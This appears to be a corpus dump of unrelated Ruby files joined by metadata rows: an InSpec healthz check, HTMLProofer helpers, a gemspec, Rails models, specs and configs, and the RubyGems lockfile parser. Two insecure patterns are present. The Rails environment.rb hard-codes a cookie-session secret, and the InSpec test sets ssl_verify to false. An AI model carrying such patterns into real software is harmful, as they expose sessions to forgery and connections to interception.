# Probe the health endpoint directly with the generated basic-auth creds.
describe http('https://localhost:6443/healthz',
method: 'GET',
open_timeout: 60,
read_timeout: 60,
ssl_verify: false,
max_redirects: 3,
auth: {
user: credentials['username'],
pass: credentials['password']
}) do
its('status') { should eq 200 }
its('body') { should eq 'ok' }
end
end
| 26.735294 | 81 | 0.657866 |
267290c9d128aa101dfaf769e159214035ae13a0 | 879 | require 'nokogiri'
module HTMLProofer
  # Small shared helpers used across HTMLProofer checks.
  module Utils
    # Returns "<count> <noun>", choosing the singular or plural noun.
    def pluralize(count, single, plural)
      "#{count} " << (count == 1 ? single : plural)
    end

    # Builds a Nokogiri HTML document from a file path, or from the string
    # itself when no file exists at that path.
    def create_nokogiri(path)
      # Fix: File.read closes the file immediately; the previous
      # File.open(path).read leaked the descriptor until GC.
      content = File.exist?(path) ? File.read(path) : path
      Nokogiri::HTML(clean_content(content))
    end
    module_function :create_nokogiri

    # Applies each link => replacement substitution to href in turn.
    def swap(href, replacement)
      replacement.each do |link, replace|
        href = href.gsub(link, replace)
      end
      href
    end
    module_function :swap

    # address a problem with Nokogiri's parsing URL entities
    # problem from http://git.io/vBYU1
    # solution from http://git.io/vBYUi
    def clean_content(string)
      string.gsub(%r{https?://([^>]+)}i) do |url|
        # Escape bare ampersands inside URLs; leave existing &amp; alone.
        url.gsub(/&(?!amp;)/, '&amp;')
      end
    end
    module_function :clean_content
  end
end
| 22.538462 | 60 | 0.610922 |
edf3758fecd0cbd3ffbecd1a2f300b00104d4852 | 98 | module Provenance::Governance
# Prefixes every model table in this namespace, e.g. a Rule model maps to
# the provenance_governance_rules table.
def self.table_name_prefix
'provenance_governance_'
end
end
| 16.333333 | 29 | 0.795918 |
acc07a27c1c733eeeb6601af7fc2e0ac237fc9f7 | 1,401 | # Generated by jeweler
# DO NOT EDIT THIS FILE DIRECTLY
# Instead, edit Jeweler::Tasks in Rakefile, and run the gemspec command
# -*- encoding: utf-8 -*-
# Jeweler-generated gemspec for the rubin round-robin generator gem;
# regenerate with `rake gemspec` after editing the Rakefile.
Gem::Specification.new do |s|
s.name = %q{rubin}
s.version = "0.2.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Rit Li"]
s.date = %q{2010-10-15}
s.description = %q{Round Robin Generator. Woot!}
s.email = %q{[email protected]}
s.extra_rdoc_files = [
"LICENSE",
"README.rdoc"
]
s.files = [
".document",
".gitignore",
"LICENSE",
"README.rdoc",
"Rakefile",
"VERSION",
"lib/rubin.rb",
"spec/rubin_spec.rb",
"spec/spec_helper.rb"
]
s.homepage = %q{http://github.com/rit/rubin}
s.rdoc_options = ["--charset=UTF-8"]
s.require_paths = ["lib"]
s.rubygems_version = %q{1.3.7}
s.summary = %q{Round Robin Generator}
s.test_files = [
"spec/rubin_spec.rb",
"spec/spec_helper.rb"
]
# Older RubyGems (< 1.2) do not understand specification_version or
# development dependencies, hence the fallbacks below.
if s.respond_to? :specification_version then
current_version = Gem::Specification::CURRENT_SPECIFICATION_VERSION
s.specification_version = 3
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<bacon>, [">= 0"])
else
s.add_dependency(%q<bacon>, [">= 0"])
end
else
s.add_dependency(%q<bacon>, [">= 0"])
end
end
| 25.944444 | 105 | 0.630978 |
bb8f1a7d27081aee076e58458f8228517bdeec5c | 200 | class User < ApplicationRecord
# A username is required and must be unique across all users.
validates :username, presence: true, uniqueness: true

# Adds password= / authenticate, storing a bcrypt digest in password_digest.
has_secure_password

has_many :character_notes
has_many :matchup_notes
end
| 22.222222 | 41 | 0.76 |
ed496b7941127d616e2fe51eef5b270c73fc33a5 | 354 | require_relative '../../spec_helper'
# Specs for Regexp.last_match, the MatchData produced by the most recent
# successful match in the current scope.
describe "Regexp.last_match" do
it "returns MatchData instance when not passed arguments" do
/c(.)t/ =~ 'cat'
Regexp.last_match.should be_kind_of(MatchData)
end
it "returns the nth field in this MatchData when passed a Fixnum" do
/c(.)t/ =~ 'cat'
Regexp.last_match(1).should == 'a'
end
end
| 23.6 | 70 | 0.680791 |
1dfba884dd1c0322e910dd97bcbb506b3e88e9f5 | 146 | # Generated via
# `rails generate hyrax:work Fact`
module Hyrax
module Actors
# Actor-stack entry for Fact works; inherits all create/update/destroy
# behavior unchanged from Hyrax's BaseActor.
class FactActor < Hyrax::Actors::BaseActor
end
end
end
| 16.222222 | 46 | 0.712329 |
084c9bdfe2a7887ca1a724daedac195b4faf8d15 | 878 | opal_filter "Opal::Parser" do
# Known parser failures in Opal around singleton-class bodies and around
# paired delimiters ({}, (), []) used to open %Q and %x literals.
fails "Singleton classes returns an empty s(:scope) when given an empty body"
fails "Singleton classes should accept any expressions for singleton part"
fails "Strings from %Q construction should match '{' and '}' pairs used to start string before ending match"
fails "Strings from %Q construction should match '(' and ')' pairs used to start string before ending match"
fails "Strings from %Q construction should match '[' and ']' pairs used to start string before ending match"
fails "x-strings created using %x notation should match '{' and '}' pairs used to start string before ending match"
fails "x-strings created using %x notation should match '(' and ')' pairs used to start string before ending match"
fails "x-strings created using %x notation should match '[' and ']' pairs used to start string before ending match"
end
| 79.818182 | 117 | 0.748292 |
ede74bcc588bc8487c539a1605dd53e432b54961 | 108 | class Patient < ActiveRecord::Base
has_many :appointments
# Doctors this patient sees, joined through their appointments.
has_many :doctors, through: :appointments
end
| 21.6 | 43 | 0.787037 |
39b6b8bc5247fa9fee200c2bcbe52ed9b03e2a11 | 496 | # Be sure to restart your server when you modify this file.
# Add new mime types for use in respond_to blocks:
# Mime::Type.register "text/richtext", :rtf
Mime::Type.register 'text/turtle', :ttl
Mime::Type.register 'application/n-triples', :nt
# Add new mime types for files in "public" directory
# See https://stackoverflow.com/a/45470372
Rack::Mime::MIME_TYPES[".ttl"]="text/turtle"
Rack::Mime::MIME_TYPES[".nt"]="application/n-triples"
# NOTE(review): this maps the generic .json extension to JSON-LD, overriding
# the standard application/json type for all static .json files — confirm
# this is intentional (a .jsonld mapping may have been meant instead).
Rack::Mime::MIME_TYPES[".json"]="application/json-ld"
| 35.428571 | 59 | 0.733871 |
79718b60ac4c7dc135764740187614fa0dfb3fab | 820 | require "test_helper"
describe RootController do
setup do
stub_user_session
end
context "the start page" do
setup do
# create some books
FactoryBot.create_list(:book, 8)
end
should "be a successful request" do
get :start
assert response.successful?
end
# All eight seeded books are exposed to the view.
should "load eight books to display to the user" do
get :start
assert_equal 8, assigns(:books).count
assert_instance_of Book, assigns(:books).first
end
# Exactly three copies are exposed as recently added.
should "load 3 recently added copies to display to the user" do
get :start
assert_equal 3, assigns(:recently_added_copies).count
assert_instance_of Copy, assigns(:recently_added_copies).first
end
should "render the start template" do
get :start
assert_template "start"
end
end
end
| 20 | 68 | 0.67439 |
189700e9975b1d926ea7a144ee1c617216aad539 | 1,167 | #
# Author:: Kendrick Martin ([email protected])
# Contributor:: David Dvorak ([email protected])
# Cookbook Name:: iis
# Resource:: config
#
# Copyright:: 2011, Webtrends Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'chef/mixin/shell_out'
include Chef::Mixin::ShellOut
include Windows::Helper
# Applies an IIS configuration change by shelling out to appcmd.exe with
# the resource's cfg_cmd arguments; accepted exit codes come from the
# resource's `returns` attribute.
action :config do
cmd = "#{appcmd} set config #{@new_resource.cfg_cmd}"
Chef::Log.debug(cmd)
shell_out!(cmd, :returns => @new_resource.returns)
Chef::Log.info("IIS Config command run")
# NOTE(review): the resource is always marked updated, even when appcmd
# changed nothing — confirm this is intended (breaks idempotent reporting).
@new_resource.updated_by_last_action(true)
end
private
# Full path to appcmd.exe, derived from the node's IIS home attribute.
def appcmd
@appcmd ||= begin
"#{node['iis']['home']}\\appcmd.exe"
end
end
| 28.463415 | 74 | 0.735219 |
28c08cfa5c6b613d40a93a4025e55340cc483745 | 120 | require 'spree_core'
require 'spree_extension'
require 'spree_simple_sales/engine'
require 'spree_simple_sales/version'
| 24 | 36 | 0.85 |
e880c35512155334372f8b6faf4fc79ce847f1f6 | 1,301 | # == Schema Info
# Schema version: 20100924060552
#
# Table name: definition_definition_forms
#
# id :integer not null, primary key
# def1_id :integer
# def2_id :integer
# created_by :string(80)
# relationship_from :string(256)
# relationship_to :string(256)
# role :string(128)
# update_history :text
# updated_by :string(80)
# created_at :string(80)
# updated_at :string(80)
module Dictionary
class DefinitionDefinitionForm < DictionaryRecord
  belongs_to :definition_to, :class_name => "Definition", :foreign_key => "def2_id"
  belongs_to :definition_from, :class_name => "Definition", :foreign_key => "def1_id"
  has_one :meta, :foreign_key => 'definition_definition_form_id'

  # Public label for the relationship; the two "... form" variants are
  # normalised to "... tense" labels, and nil becomes "".
  def displayFromInfoPublic
    case relationship_to
    when 'future form'
      "future tense"
    when 'imperative form'
      "imperative tense"
    when nil
      ""
    else
      relationship_to.dup
    end
  end

  # Term of the related definition, or "" when either the association or
  # its term is missing.
  def displayFromTerm
    term = definition_to && definition_to.term
    term ? term.dup : ""
  end
end
end | 28.911111 | 88 | 0.624135 |
87747890fb0bd059bbc973b313ed3540920ea57a | 1,389 | # typed: true
# frozen_string_literal: true
module Tasker
  # Central status vocabulary for tasks and workflow steps, plus the derived
  # lists used for validation and completion checks.
  module Constants
    # Lifecycle states for an individual workflow step.
    module WorkflowStepStatuses
      PENDING = 'pending'
      IN_PROGRESS = 'in_progress'
      ERROR = 'error'
      COMPLETE = 'complete'
      RESOLVED_MANUALLY = 'resolved_manually'
      CANCELLED = 'cancelled'
    end

    # Lifecycle states for a task as a whole.
    # NOTE: currently mirrors WorkflowStepStatuses value-for-value; the two
    # modules are kept separate so the vocabularies can diverge independently.
    module TaskStatuses
      PENDING = 'pending'
      IN_PROGRESS = 'in_progress'
      ERROR = 'error'
      COMPLETE = 'complete'
      RESOLVED_MANUALLY = 'resolved_manually'
      CANCELLED = 'cancelled'
    end

    # Every status a workflow step may legally hold.
    VALID_WORKFLOW_STEP_STATUSES = [
      WorkflowStepStatuses::PENDING,
      WorkflowStepStatuses::IN_PROGRESS,
      WorkflowStepStatuses::ERROR,
      WorkflowStepStatuses::COMPLETE,
      WorkflowStepStatuses::CANCELLED,
      WorkflowStepStatuses::RESOLVED_MANUALLY
    ].freeze

    # Every status a task may legally hold.
    VALID_TASK_STATUSES = [
      TaskStatuses::PENDING,
      TaskStatuses::IN_PROGRESS,
      TaskStatuses::ERROR,
      TaskStatuses::COMPLETE,
      TaskStatuses::CANCELLED,
      TaskStatuses::RESOLVED_MANUALLY
    ].freeze

    # Step statuses that count as "finished" (no further processing).
    VALID_STEP_COMPLETION_STATES = [
      WorkflowStepStatuses::COMPLETE,
      WorkflowStepStatuses::RESOLVED_MANUALLY,
      WorkflowStepStatuses::CANCELLED
    ].freeze

    # Step statuses that count as "still in flight".
    VALID_STEP_STILL_WORKING_STATES = [WorkflowStepStatuses::PENDING, WorkflowStepStatuses::IN_PROGRESS].freeze

    # Sentinel for a status that cannot be determined.
    UNKNOWN = 'unknown'

    # Default number of retry attempts for a step.
    DEFAULT_RETRY_LIMIT = 3
  end
end
| 26.207547 | 111 | 0.696184 |
bfcf9e20a4a9defad4ceb1939c9156854cae17f4 | 153 | require "spec_helper"
describe ConvenientGrouper::Error do
  it 'is a StandardError' do
    # Instances of the gem's error class must be rescuable as StandardError.
    instance = described_class.new
    expect(instance).to be_kind_of(StandardError)
  end
end
| 19.125 | 53 | 0.777778 |
b9423fc8ba3b776a65093b09c8352cb95fb386d3 | 3,129 | secrets = Rails.application.secrets.mailer
OnlineReportingTool::Application.configure do
# Settings specified here will take precedence over those in config/application.rb
# Code is not reloaded between requests
config.cache_classes = true
# Full error reports are disabled and caching is turned on
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Disable Rails's static asset server (Apache or nginx will already do this)
config.serve_static_assets = false
# Compress JavaScripts and CSS
config.assets.compress = true
# Don't fallback to assets pipeline if a precompiled asset is missed
config.assets.compile = false
# Generate digests for assets URLs
config.assets.digest = true
# Defaults to nil and saved in location specified by config.assets.prefix
# config.assets.manifest = YOUR_PATH
# Specifies the header that your server uses for sending files
# config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# See everything in the log (default is :info)
config.log_level = :debug
# Prepend all log lines with the following tags
# config.log_tags = [ :subdomain, :uuid ]
# Use a different logger for distributed setups
# config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
# Use a different cache store in production
# config.cache_store = :mem_cache_store
# Enable serving of images, stylesheets, and JavaScripts from an asset server
# config.action_controller.asset_host = "http://assets.example.com"
# Precompile additional assets (application.js, application.css, and all non-JS/CSS are already added)
# config.assets.precompile += %w( search.js )
# Disable delivery errors, bad email addresses will be ignored
config.action_mailer.raise_delivery_errors = true
config.action_mailer.delivery_method = :smtp
config.action_mailer.asset_host = secrets['asset_host']
config.action_mailer.default_url_options = {:host => secrets['host']}
config.action_mailer.smtp_settings = {
:enable_starttls_auto => true,
:address => secrets['address'],
:port => secrets['port'],
:domain => secrets['domain'],
:authentication => :login,
:user_name => secrets['username'],
:password => secrets['password']
}
# Enable threaded mode
# config.threadsafe!
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation can not be found)
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners
config.active_support.deprecation = :notify
# Raise exception on mass assignment protection for Active Record models
config.active_record.mass_assignment_sanitizer = :strict
# Log the query plan for queries taking more than this (works
# with SQLite, MySQL, and PostgreSQL)
config.active_record.auto_explain_threshold_in_seconds = 0.5
end
| 36.811765 | 104 | 0.753276 |
114038bfcf8b4c9b4bbf867b7ad082c322e78226 | 13,605 | require 'strscan'
##
# Parses a gem.deps.rb.lock file and constructs a LockSet containing the
# dependencies found inside. If the lock file is missing no LockSet is
# constructed.
class Gem::RequestSet::Lockfile
  ##
  # Raised when a lockfile cannot be parsed
  class ParseError < Gem::Exception
    ##
    # The column where the error was encountered
    attr_reader :column

    ##
    # The line where the error was encountered
    attr_reader :line

    ##
    # The location of the lock file
    attr_reader :path

    ##
    # Raises a ParseError with the given +message+ which was encountered at a
    # +line+ and +column+ while parsing.
    def initialize message, column, line, path
      @line = line
      @column = column
      @path = path
      super "#{message} (at line #{line} column #{column})"
    end
  end

  ##
  # The platforms for this Lockfile
  attr_reader :platforms

  ##
  # Creates a new Lockfile for the given +request_set+ and +gem_deps_file+
  # location.
  def initialize request_set, gem_deps_file
    @set = request_set
    @gem_deps_file = File.expand_path(gem_deps_file)
    @gem_deps_dir = File.dirname(@gem_deps_file)
    # :ghost means tokens/objects have not been loaded yet.
    @current_token = nil
    @line = 0
    @line_pos = 0
    @platforms = []
    @tokens = []
  end

  ##
  # Appends the DEPENDENCIES section to +out+ (an Array of output lines).
  # Vendor and git sourced gems get a trailing "!" instead of a version
  # requirement.
  def add_DEPENDENCIES out # :nodoc:
    out << "DEPENDENCIES"
    @requests.sort_by { |r| r.name }.each do |request|
      spec = request.spec
      if [Gem::Resolver::VendorSpecification,
          Gem::Resolver::GitSpecification].include? spec.class then
        out << "  #{request.name}!"
      else
        requirement = request.request.dependency.requirement
        out << "  #{request.name}#{requirement.for_lockfile}"
      end
    end
    out << nil
  end

  ##
  # Appends one GEM section per remote source to +out+, listing each resolved
  # spec (4-space indent) and its dependencies (6-space indent).
  def add_GEM out # :nodoc:
    return if @spec_groups.empty?
    source_groups = @spec_groups.values.flatten.group_by do |request|
      request.spec.source.uri
    end
    source_groups.sort_by { |group,| group.to_s }.map do |group, requests|
      out << "GEM"
      out << "  remote: #{group}"
      out << "  specs:"
      requests.sort_by { |request| request.name }.each do |request|
        # Only non-ruby platforms are written as a "-platform" suffix.
        platform = "-#{request.spec.platform}" unless
          Gem::Platform::RUBY == request.spec.platform
        out << "    #{request.name} (#{request.version}#{platform})"
        request.full_spec.dependencies.sort.each do |dependency|
          requirement = dependency.requirement
          out << "      #{dependency.name}#{requirement.for_lockfile}"
        end
      end
      out << nil
    end
  end

  ##
  # Appends a GIT section to +out+, grouped by repository and resolved
  # revision.  Consumes the git group from @spec_groups.
  def add_GIT out
    return unless git_requests =
      @spec_groups.delete(Gem::Resolver::GitSpecification)
    by_repository_revision = git_requests.group_by do |request|
      source = request.spec.source
      [source.repository, source.rev_parse]
    end
    out << "GIT"
    by_repository_revision.each do |(repository, revision), requests|
      out << "  remote: #{repository}"
      out << "  revision: #{revision}"
      out << "  specs:"
      requests.sort_by { |request| request.name }.each do |request|
        out << "    #{request.name} (#{request.version})"
        dependencies = request.spec.dependencies.sort_by { |dep| dep.name }
        dependencies.each do |dep|
          out << "      #{dep.name}#{dep.requirement.for_lockfile}"
        end
      end
    end
    out << nil
  end

  ##
  # Returns +dest+ relative to +base+ when +base+ is a prefix of +dest+,
  # otherwise the expanded +dest+ unchanged.
  def relative_path_from dest, base # :nodoc:
    dest = File.expand_path(dest)
    base = File.expand_path(base)
    if dest.index(base) == 0
      return dest[base.size+1..-1]
    else
      dest
    end
  end

  ##
  # Appends a PATH section for vendored gems to +out+; remotes are written
  # relative to the gem deps file's directory.  Consumes the vendor group
  # from @spec_groups.
  def add_PATH out # :nodoc:
    return unless path_requests =
      @spec_groups.delete(Gem::Resolver::VendorSpecification)
    out << "PATH"
    path_requests.each do |request|
      directory = File.expand_path(request.spec.source.uri)
      out << "  remote: #{relative_path_from directory, @gem_deps_dir}"
      out << "  specs:"
      out << "    #{request.name} (#{request.version})"
    end
    out << nil
  end

  ##
  # Appends the PLATFORMS section to +out+.  The ruby platform is omitted
  # when any other platform is present.
  def add_PLATFORMS out # :nodoc:
    out << "PLATFORMS"
    platforms = @requests.map { |request| request.spec.platform }.uniq
    platforms.delete Gem::Platform::RUBY if platforms.length > 1
    platforms.each do |platform|
      out << "  #{platform}"
    end
    out << nil
  end

  ##
  # Gets the next token for a Lockfile
  def get expected_types = nil, expected_value = nil # :nodoc:
    @current_token = @tokens.shift
    type, value, column, line = @current_token
    # Either check failure pushes the token back before raising so the
    # stream is left consistent for error reporting.
    if expected_types and not Array(expected_types).include? type then
      unget
      message = "unexpected token [#{type.inspect}, #{value.inspect}], " +
                "expected #{expected_types.inspect}"
      raise ParseError.new message, column, line, "#{@gem_deps_file}.lock"
    end
    if expected_value and expected_value != value then
      unget
      message = "unexpected token [#{type.inspect}, #{value.inspect}], " +
                "expected [#{expected_types.inspect}, " +
                "#{expected_value.inspect}]"
      raise ParseError.new message, column, line, "#{@gem_deps_file}.lock"
    end
    @current_token
  end

  ##
  # Tokenizes the lock file and dispatches on each top-level section name.
  # Unrecognized sections are skipped token-by-token until the next section.
  def parse # :nodoc:
    tokenize
    until @tokens.empty? do
      type, data, column, line = get
      case type
      when :section then
        skip :newline
        case data
        when 'DEPENDENCIES' then
          parse_DEPENDENCIES
        when 'GIT' then
          parse_GIT
        when 'GEM' then
          parse_GEM
        when 'PATH' then
          parse_PATH
        when 'PLATFORMS' then
          parse_PLATFORMS
        else
          # Unknown section: consume until the next section header.
          type, = get until @tokens.empty? or peek.first == :section
        end
      else
        raise "BUG: unhandled token #{type} (#{data.inspect}) at line #{line} column #{column}"
      end
    end
  end

  ##
  # Parses the DEPENDENCIES section, adding each gem (with its requirements,
  # or the pinned version for "!" vendor/git entries) to the request set.
  def parse_DEPENDENCIES # :nodoc:
    while not @tokens.empty? and :text == peek.first do
      _, name, = get :text
      requirements = []
      case peek[0]
      when :bang then
        get :bang
        # "name!" entries pin to the version found in a git or vendor set.
        spec = @set.sets.select { |set|
          Gem::Resolver::GitSet === set or
            Gem::Resolver::VendorSet === set
        }.map { |set|
          set.specs[name]
        }.first
        requirements << spec.version
      when :l_paren then
        get :l_paren
        loop do
          _, op, = get :requirement
          _, version, = get :text
          requirements << "#{op} #{version}"
          break unless peek[0] == :comma
          get :comma
        end
        get :r_paren
      end
      @set.gem name, *requirements
      skip :newline
    end
  end

  ##
  # Parses a GEM section into a LockSet added to the request set's sets.
  # Column 4 marks a spec line; column 6 marks one of its dependency lines
  # (matching the indentation written by add_GEM).
  def parse_GEM # :nodoc:
    sources = []
    while [:entry, 'remote'] == peek.first(2) do
      get :entry, 'remote'
      _, data, = get :text
      skip :newline
      sources << Gem::Source.new(data)
    end
    sources << Gem::Source.new(Gem::DEFAULT_HOST) if sources.empty?
    get :entry, 'specs'
    skip :newline
    set = Gem::Resolver::LockSet.new sources
    last_specs = nil
    while not @tokens.empty? and :text == peek.first do
      _, name, column, = get :text
      case peek[0]
      when :newline then
        # Dependency with no requirement parenthesis.
        last_specs.each do |spec|
          spec.add_dependency Gem::Dependency.new name if column == 6
        end
      when :l_paren then
        get :l_paren
        type, data, = get [:text, :requirement]
        if type == :text and column == 4 then
          # Spec line: "(version[-platform])".
          version, platform = data.split '-', 2
          platform =
            platform ? Gem::Platform.new(platform) : Gem::Platform::RUBY
          last_specs = set.add name, version, platform
        else
          # Dependency line with a requirement operator.
          dependency = parse_dependency name, data
          last_specs.each do |spec|
            spec.add_dependency dependency
          end
        end
        get :r_paren
      else
        raise "BUG: unknown token #{peek}"
      end
      skip :newline
    end
    @set.sets << set
  end

  ##
  # Parses a GIT section into a GitSet added to the request set's sets.
  # Optional branch/ref/tag entries are consumed but otherwise ignored here.
  def parse_GIT # :nodoc:
    get :entry, 'remote'
    _, repository, = get :text
    skip :newline
    get :entry, 'revision'
    _, revision, = get :text
    skip :newline
    type, value = peek.first 2
    if type == :entry and %w[branch ref tag].include? value then
      get
      get :text
      skip :newline
    end
    get :entry, 'specs'
    skip :newline
    set = Gem::Resolver::GitSet.new
    last_spec = nil
    while not @tokens.empty? and :text == peek.first do
      _, name, column, = get :text
      case peek[0]
      when :newline then
        last_spec.add_dependency Gem::Dependency.new name if column == 6
      when :l_paren then
        get :l_paren
        type, data, = get [:text, :requirement]
        if type == :text and column == 4 then
          last_spec = set.add_git_spec name, data, repository, revision, true
        else
          dependency = parse_dependency name, data
          last_spec.spec.dependencies << dependency
        end
        get :r_paren
      else
        raise "BUG: unknown token #{peek}"
      end
      skip :newline
    end
    @set.sets << set
  end

  ##
  # Parses a PATH section into a VendorSet added to the request set's sets.
  def parse_PATH # :nodoc:
    get :entry, 'remote'
    _, directory, = get :text
    skip :newline
    get :entry, 'specs'
    skip :newline
    set = Gem::Resolver::VendorSet.new
    last_spec = nil
    while not @tokens.empty? and :text == peek.first do
      _, name, column, = get :text
      case peek[0]
      when :newline then
        last_spec.add_dependency Gem::Dependency.new name if column == 6
      when :l_paren then
        get :l_paren
        type, data, = get [:text, :requirement]
        if type == :text and column == 4 then
          last_spec = set.add_vendor_gem name, directory
        else
          dependency = parse_dependency name, data
          last_spec.spec.dependencies << dependency
        end
        get :r_paren
      else
        raise "BUG: unknown token #{peek}"
      end
      skip :newline
    end
    @set.sets << set
  end

  ##
  # Parses the PLATFORMS section into the #platforms Array.
  def parse_PLATFORMS # :nodoc:
    while not @tokens.empty? and :text == peek.first do
      _, name, = get :text
      @platforms << name
      skip :newline
    end
  end

  ##
  # Parses the requirements following the dependency +name+ and the +op+ for
  # the first token of the requirements and returns a Gem::Dependency object.
  def parse_dependency name, op # :nodoc:
    return Gem::Dependency.new name unless peek[0] == :text
    _, version, = get :text
    requirements = ["#{op} #{version}"]
    while peek[0] == :comma do
      get :comma
      _, op, = get :requirement
      _, version, = get :text
      requirements << "#{op} #{version}"
    end
    Gem::Dependency.new name, requirements
  end

  ##
  # Peeks at the next token for Lockfile
  def peek # :nodoc:
    @tokens.first || [:EOF]
  end

  ##
  # Consumes consecutive tokens of +type+ from the front of the stream.
  def skip type # :nodoc:
    get while not @tokens.empty? and peek.first == type
  end

  ##
  # The contents of the lock file.
  def to_s
    @set.resolve
    out = []
    @requests = @set.sorted_requests
    @spec_groups = @requests.group_by do |request|
      request.spec.class
    end
    # Section order is fixed: PATH, GIT, GEM, PLATFORMS, DEPENDENCIES.
    add_PATH out
    add_GIT out
    add_GEM out
    add_PLATFORMS out
    add_DEPENDENCIES out
    out.join "\n"
  end

  ##
  # Calculates the column (by byte) and the line of the current token based on
  # +byte_offset+.
  def token_pos byte_offset # :nodoc:
    [byte_offset - @line_pos, @line]
  end

  ##
  # Converts a lock file into an Array of tokens.  If the lock file is missing
  # an empty Array is returned.
  def tokenize # :nodoc:
    @line = 0
    @line_pos = 0
    @platforms = []
    @tokens = []
    @current_token = nil
    lock_file = "#{@gem_deps_file}.lock"
    @input = File.read lock_file
    s = StringScanner.new @input
    until s.eos? do
      pos = s.pos
      # Skip leading spaces but remember we saw them: indented ALL-CAPS
      # words are :text, unindented ones are :section headers.
      pos = s.pos if leading_whitespace = s.scan(/ +/)
      if s.scan(/[<|=>]{7}/) then
        message = "your #{lock_file} contains merge conflict markers"
        column, line = token_pos pos
        raise ParseError.new message, column, line, lock_file
      end
      @tokens <<
        case
        when s.scan(/\r?\n/) then
          token = [:newline, nil, *token_pos(pos)]
          @line_pos = s.pos
          @line += 1
          token
        when s.scan(/[A-Z]+/) then
          if leading_whitespace then
            text = s.matched
            text += s.scan(/[^\s)]*/).to_s # in case of no match
            [:text, text, *token_pos(pos)]
          else
            [:section, s.matched, *token_pos(pos)]
          end
        when s.scan(/([a-z]+):\s/) then
          s.pos -= 1 # rewind for possible newline
          [:entry, s[1], *token_pos(pos)]
        when s.scan(/\(/) then
          [:l_paren, nil, *token_pos(pos)]
        when s.scan(/\)/) then
          [:r_paren, nil, *token_pos(pos)]
        when s.scan(/<=|>=|=|~>|<|>|!=/) then
          [:requirement, s.matched, *token_pos(pos)]
        when s.scan(/,/) then
          [:comma, nil, *token_pos(pos)]
        when s.scan(/!/) then
          [:bang, nil, *token_pos(pos)]
        when s.scan(/[^\s),!]*/) then
          [:text, s.matched, *token_pos(pos)]
        else
          raise "BUG: can't create token for: #{s.string[s.pos..-1].inspect}"
        end
    end
    @tokens
  rescue Errno::ENOENT
    # Missing lock file is not an error; parsing simply finds no tokens.
    @tokens
  end

  ##
  # Ungets the last token retrieved by #get
  def unget # :nodoc:
    @tokens.unshift @current_token
  end

  ##
  # Writes the lock file alongside the gem dependencies file
  def write
    open "#{@gem_deps_file}.lock", 'w' do |io|
      io.write to_s
    end
  end
end
| 22.599668 | 95 | 0.579125 |
ac3c7635591219040419da6350100cebd498fcc7 | 3,964 | # Be sure to restart your server when you modify this file
# Uncomment below to force Rails into production mode when
# you don't control web/app server and can't set it the proper way
# ENV['RAILS_ENV'] ||= 'production'
# Specifies gem version of Rails to use when vendor/rails is not present
# Specifies gem version of Rails to use when vendor/rails is not present
RAILS_GEM_VERSION = '2.2.2' unless defined? RAILS_GEM_VERSION

# Bootstrap the Rails environment, frameworks, and default configuration
require File.join(File.dirname(__FILE__), 'boot')

Rails::Initializer.run do |config|
  # Settings in config/environments/* take precedence over those specified here.
  # Application configuration should go into files in config/initializers
  # -- all .rb files in that directory are automatically loaded.
  # See Rails::Configuration for more options.
  # Skip frameworks you're not going to use. To use Rails without a database
  # you must remove the Active Record framework.
  # config.frameworks -= [ :active_record, :active_resource, :action_mailer ]
  # Specify gems that this application depends on.
  # They can then be installed with "rake gems:install" on new installations.
  # You have to specify the :lib option for libraries, where the Gem name (sqlite3-ruby) differs from the file itself (sqlite3)
  # config.gem "bj"
  # config.gem "hpricot", :version => '0.6', :source => "http://code.whytheluckystiff.net"
  # config.gem "sqlite3-ruby", :lib => "sqlite3"
  # config.gem "aws-s3", :lib => "aws/s3"
  # Only load the plugins named here, in the order given. By default, all plugins
  # in vendor/plugins are loaded in alphabetical order.
  # :all can be used as a placeholder for all plugins not explicitly named
  # config.plugins = [ :exception_notification, :ssl_requirement, :all ]
  # Add additional load paths for your own custom dirs
  # config.load_paths += %W( #{RAILS_ROOT}/extras )
  # Force all environments to use the same logger level
  # (by default production uses :info, the others :debug)
  # config.log_level = :debug
  # Make Time.zone default to the specified zone, and make Active Record store time values
  # in the database in UTC, and return them converted to the specified local zone.
  # Run "rake -D time" for a list of tasks for finding time zone names. Comment line to use default local time.
  config.time_zone = 'UTC'
  # The internationalization framework can be changed to have another default locale (standard is :en) or more load paths.
  # All files from config/locales/*.rb,yml are added automatically.
  # config.i18n.load_path << Dir[File.join(RAILS_ROOT, 'my', 'locales', '*.{rb,yml}')]
  # config.i18n.default_locale = :de
  # Your secret key for verifying cookie session data integrity.
  # If you change this key, all old sessions will become invalid!
  # Make sure the secret is at least 30 characters and all random,
  # no regular words or you'll be exposed to dictionary attacks.
  # NOTE(review): this secret is committed to source control; consider loading
  # it from the environment instead of hard-coding it here.
  config.action_controller.session = {
    :session_key => '_example_rails_app_session',
    :secret => '083812545b4969fc3b9086ab594b2c238c3f90dfb1c5f1679f403a4591e7fd8770de80030f8d0c988d217788fac9d8a1eec254459faf0a0892acc4466284aec8'
  }
  # Use the database for sessions instead of the cookie-based default,
  # which shouldn't be used to store highly confidential information
  # (create the session table with "rake db:sessions:create")
  # config.action_controller.session_store = :active_record_store
  # Use SQL instead of Active Record's schema dumper when creating the test database.
  # This is necessary if your schema can't be completely dumped by the schema dumper,
  # like if you have constraints or database-specific column types
  # config.active_record.schema_format = :sql
  # Activate observers that should always be running
  # Please note that observers generated using script/generate observer need to have an _observer suffix
  # config.active_record.observers = :cacher, :garbage_collector, :forum_observer
end
require 'aux_codes'
